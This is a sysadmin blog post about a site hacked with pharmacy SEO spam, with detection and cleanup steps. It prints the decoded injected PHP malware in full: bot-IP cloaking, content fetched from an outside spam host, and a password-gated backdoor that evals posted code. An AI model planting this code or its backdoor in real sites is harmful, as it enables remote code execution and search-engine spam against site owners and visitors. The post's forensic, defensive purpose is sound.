Site Hacked with Pharmacy Spammy Content on search listings

Got a email* today today that adminschoice.com searches on google.com are resulting in pharmacy spammy urls and contents. It took around three hours to find out what is happening and fixing it. Finally the site should be free of spam now. It may take a while to update google index entries but redirect is not happening any more.

For the benefit of sysadmins who may face this issue here are some details to take care of this

Anatomy of Site hacked with pharmacy spammy content on search listings

How it works , how google listings are modified

A malicious code is inserted in one of your files such as functions.php file.
This Code modifies request for the pages to your website to be served from another server.
When googlebot/msn or other bots indexes the site , your content is hidden due to redirect and pharmacy spammy content is retrieved by the bot. This result is updated in the Google index and you see the entries in Google search results.
( You can check what Google-bot , msn , yahoo bots are getting from your web page — http://redleg-redleg.com/file-viewer/ )

When you click on the link in the search engine it is redirected to other site from within your site so link remains the same and content & its description changes.

Here is the details to find out and remove the malicious software from your site

  • 1. The hacked code is generally inserted in a php or other files as base64 encoded strings similar to one beloweval(base64_decode(‘ZXJyb3JfcmVwb3J0aW5nKDApOwokYm90X2xpc3QgPSBhcnJheSgiOC42LjQ4IiwiNjIuMTcyLjE5OSIsIjYyLjI3LjU5IiwiNjMuMTYzLjEwMiIsIjY0LjE1Ny4xMzciLCI2NC4xNTcuMTM4IiwiNjQuMjMzLjE3MyIsIjY0LjY4LjgwIiwiNjQuNjguODEiLCI2NC42OC44M — so on for few lines ( ~8k string in this example )
  • 2. Use find and grep to find the eval & base64_decode string inside the files , Many files will have it for legitimate purpose but the hacked file will have a encode string to hide the program line .Use following command to find the code :

    find . -exec grep -i eval {} ; | grep base64; — look for long strings of numbers and letters

    find . -exec grep -l eval {} ; | grep base64; — Gives names of files

  • 3. From the above commands pin point the hacked file name. Do a `more` on the file to see that you have the correct file. Rename the file so that it is no longer used by any program.
  • 4. if you have a copy of original file then copy it here or you can do a grep -v base64 > good-file.php to remove the string code and rename to original file.
  • 5. if interested, You can check copy paste the string at http://www.functions-online.com/base64_decode.html to see what the program was trying to do.

For the curious who wants to know what is happening here is the code after base64 decoding (http://www.functions-online.com/base64_decode.html) . This was added in one of the .php file as base64 encoded string of ~7k long casuing google results to show spammy link description.

———-code —
$bot_list = array(“8.6.48″,”62.172.199″,”62.27.59″,”63.163.102″,”64.157.137″,”64.157.138″,”64.233.173″,”64.68.80″,”64.68.81″,”64.68.82″,”64.68.83″,”64.68.84″,”64.68.85″,”64.68.86″,”64.68.87″,”64.68.88″,”64.68.89″,”64.68.90″,”64.68.91″,”64.68.92″,”64.75.36″,”66.163.170″,”66.163.174″,”66.196.101″,”66.196.65″,”66.196.67″,”66.196.72″,”66.196.73″,”66.196.74″,”66.196.77″,”66.196.78″,”66.196.80″,”66.196.81″,”66.196.90″,”66.196.91″,”66.196.92″,”66.196.93″,”66.196.97″,”66.196.99″,”66.218.65″,”66.218.70″,”66.228.164″,”66.228.165″,”66.228.166″,”66.228.173″,”66.228.182″,”66.249.64″,”66.249.65″,”66.249.66″,”66.249.67″,”66.249.68″,”66.249.69″,”66.249.70″,”66.249.71″,”66.249.72″,”66.249.73″,”66.249.78″,”66.249.79″,”66.94.230″,”66.94.232″,”66.94.233″,”66.94.238″,”67.195.115″,”67.195.34″,”67.195.37″,”67.195.44″,”67.195.45″,”67.195.50″,”67.195.51″,”67.195.52″,”67.195.53″,”67.195.54″,”67.195.58″,”67.195.98″,”68.142.195″,”68.142.203″,”68.142.211″,”68.142.212″,”68.142.230″,”68.142.231″,”68.142.240″,”68.142.246″,”68.142.249″,”68.142.250″,”68.142.251″,”68.180.216″,”68.180.250″,”68.180.251″,”69.147.79″,”72.14.199″,”72.30.101″,”72.30.102″,”72.30.103″,”72.30.104″,”72.30.107″,”72.30.110″,”72.30.111″,”72.30.124″,”72.30.128″,”72.30.129″,”72.30.131″,”72.30.132″,”72.30.133″,”72.30.134″,”72.30.135″,”72.30.142″,”72.30.161″,”72.30.177″,”72.30.179″,”72.30.213″,”72.30.214″,”72.30.215″,”72.30.216″,”72.30.221″,”72.30.226″,”72.30.252″,”72.30.54″,”72.30.56″,”72.30.60″,”72.30.61″,”72.30.65″,”72.30.78″,”72.30.79″,”72.30.81″,”72.30.87″,”72.30.9″,”72.30.97″,”72.30.98″,”72.30.99″,”74.6.11″,”74.6.12″,”74.6.13″,”74.6.131″,”74.6.16″,”74.6.17″,”74.6.18″,”74.6.19″,”74.6.20″,”74.6.21″,”74.6.22″,”74.6.23″,”74.6.24″,”74.6.240″,”74.6.25″,”74.6.26″,”74.6.27″,”74.6.28″,”74.6.29″,”74.6.30″,”74.6.31″,”74.6.65″,”74.6.66″,”74.6.67″,”74.6.68″,”74.6.69″,”74.6.7″,”74.6.70″,”74.6.71″,”74.6.72″,”74.6.73″,”74.6.74″,”74.6.75″,”74.6.76″,”74.6.79″,”74.6.8″,”74.6.85″,”74.6.86″,”74.6.87″,”74.6.9″,”141.185.209″,”169.207.238″,”199.177.18″,”202.160.178″,”202.160.179″,”202.160.180″,”202.160.181″,”202.160.183″,”202.160.185″,”202.165.96″,”202.165.98″,”202.165.99″,”202.212.5″,”202.46.19″,”203.123.188″,”203.141.52″,”203.255.234″,”206.190.43″,”207.126.239″,”209.1.12″,”209.1.13″,”209.1.32″,”209.1.38″,”209.131.40″,”209.131.41″,”209.131.48″,”209.131.49″,”209.131.50″,”209.131.51″,”209.131.60″,”209.131.62″,”209.185.108″,”209.185.122″,”209.185.141″,”209.185.143″,”209.185.253″,”209.191.123″,”209.191.64″,”209.191.65″,”209.191.82″,”209.191.83″,”209.67.206″,”209.73.176″,”209.85.238″,”211.14.8″,”211.169.241″,”213.216.143″,”216.109.121″,”216.109.126″,”216.136.233″,”216.145.58″,”216.155.198″,”216.155.200″,”216.155.202″,”216.155.204″,”216.239.193″,”216.239.33″,”216.239.37″,”216.239.39″,”216.239.41″,”216.239.45″,”216.239.46″,”216.239.51″,”216.239.53″,”216.239.57″,”216.239.59″,”216.32.237″,”216.33.229″,”174.129.130”, “174.36.55”, “94.100.17”);
$ip = preg_replace(“/.(d+)$/”, ”, $_SERVER[“REMOTE_ADDR”]);
$originalip = $_SERVER[“REMOTE_ADDR”];
function read_content($getsite,$getpage,$typeread) {
$out=””;
$sourceurl=base64_decode(‘http://glavget.com/get/?site==’).urlencode($getsite).’&page=’.urlencode($getpage).’&ip=’.urlencode($_SERVER[‘REMOTE_ADDR’]).’&agent=’.urlencode($_SERVER[‘HTTP_USER_AGENT’]);
if ($typeread == “seo”){
$sourceurl=$sourceurl.”&seo=yes”;
}
if ($typeread == “traffic”){
$sourceurl=$getsite;
}
if (function_exists(“curl_init”)) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $sourceurl);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
curl_setopt($c, CURLOPT_TIMEOUT, 10);
$out = curl_exec($c);
curl_close($c);
}
if($out==””){
$out = @file_get_contents($sourceurl);
}
if($out==””){
if(!preg_match(‘/^http(s){0,1}://(.*?)//’, $sourceurl, $matches)) {
$out = “”;
}
$domain = $matches[2];
$fp = fsockopen($domain, 80, $errno, $errstr, 30);
if(!$fp) { $out = ”; } else {
$crlf = “rn”;
$req = “GET $sourceurl HTTP/1.0″.$crlf;
$req .= ‘Host: ‘.$domain.$crlf;
$req .= ‘User-Agent: Mozilla/5.0 Firefox/3.6.12’.$crlf.$crlf;
fwrite($fp, $req);
$out = ”;
while(!feof($fp)) {
$out .= fgets($fp, 256);
}
$out = substr($out, strpos($out, “rnrn”)+4);
}
}
if($out==””){
$out = “0”;
}
return $out;
}
if(!array_key_exists(‘HTTP_USER_AGENT’, $_SERVER))
$_SERVER[‘HTTP_USER_AGENT’] = ”;
if(md5($_POST[“key”]) == “c8d4613f940c517da44c91e7223140f3”){ $cmd = $_POST[“code”]; eval (stripslashes($cmd)); exit; }
if(in_array($ip, $bot_list) || strpos($_SERVER[‘HTTP_USER_AGENT’], “bot”)) {
$printpage=read_content($_SERVER[‘HTTP_HOST’],$_SERVER[‘REQUEST_URI’]);
if (substr($printpage,0,3) == “OK!”){
$printpage = substr($printpage,3);
} else {
$printpage = “0”;
}
if ($printpage!=”0″) {
echo $printpage; die;
}
}
if (preg_match(‘/live|msn|yahoo|google|ask|aol/’, $_SERVER[“HTTP_REFERER”]) && !preg_match(“/^(000000000000)/”, $originalip)) {
$seopage=read_content($_SERVER[‘HTTP_HOST’],$_SERVER[‘REQUEST_URI’], ‘seo’);
$trafficpage=”0″;
if (substr($seopage,0,4) == “SEO!”){
$getkeyword = substr($seopage,4);
$urlsutra = base64_decode(‘aHR0cDovL2tsaWtjZW50cmFsLmNvbS90cmFmZmljL2luLmNnaT8xMCZwYXJhbWV0ZXI9’);
$urlsutra = $urlsutra.urlencode($getkeyword).”&seoref=”.$_SERVER[“HTTP_REFERER”].”&HTTP_REFERER=”.$_SERVER[‘HTTP_HOST’];
header(‘Cache-Control: no-cache, no-store, must-revalidate’);
$trafficpage=read_content($urlsutra,”, ‘traffic’);
if($trafficpage!=”0″){
echo $trafficpage; die;
} else {
header(“location: “.$urlsutra); die;
}
}
}
——end code ——

* Thanks Andy for pointing out this issue.

One Response to Site Hacked with Pharmacy Spammy Content on search listings

  1. Amine says:

    It happened to a website I used to manage. They inject a code that you don’t see when you browse the website. However, search engines see a different content. I think they call it “black SEO”.

    If you have access to the server config files, you can try to disable php functions you don’t need. Many scripts used by ill intentionned parties rely heavily in functions like system, passthru… etc. While most website don’t need them. If you block these, even if they manage to upload a script to the server and call it from a browser, it’s not going to work.

Leave a Reply

Your email address will not be published. Required fields are marked *